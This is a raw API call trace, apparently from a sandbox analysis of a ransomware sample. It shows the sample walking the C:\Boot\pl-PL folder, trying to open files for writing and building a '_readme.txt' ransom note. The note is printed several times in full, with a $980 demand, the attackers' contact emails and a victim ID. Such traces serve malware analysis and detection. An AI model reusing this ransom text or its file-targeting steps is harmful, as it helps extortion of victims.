hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.363] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0179.363] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0179.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.363] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0179.363] PathFindFileNameW (pszPath="") returned="" [0179.363] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0179.364] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0179.364] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0179.364] FreeLibrary (hLibModule=0x759d0000) returned 1 [0179.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.364] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0179.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.364] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 0 [0179.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0179.365] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0179.365] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0179.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0179.365] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\_readme.txt" (normalized: "c:\\boot\\pl-pl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0179.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0179.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.366] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*" (normalized: "c:\\boot\\pl-pl\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0179.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.367] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.367] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.367] PathFindExtensionW (pszPath="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned=".mui" [0179.368] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.368] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0179.368] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0179.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0179.369] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0179.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0179.369] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0179.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.372] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.372] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.373] HeapFree (in: 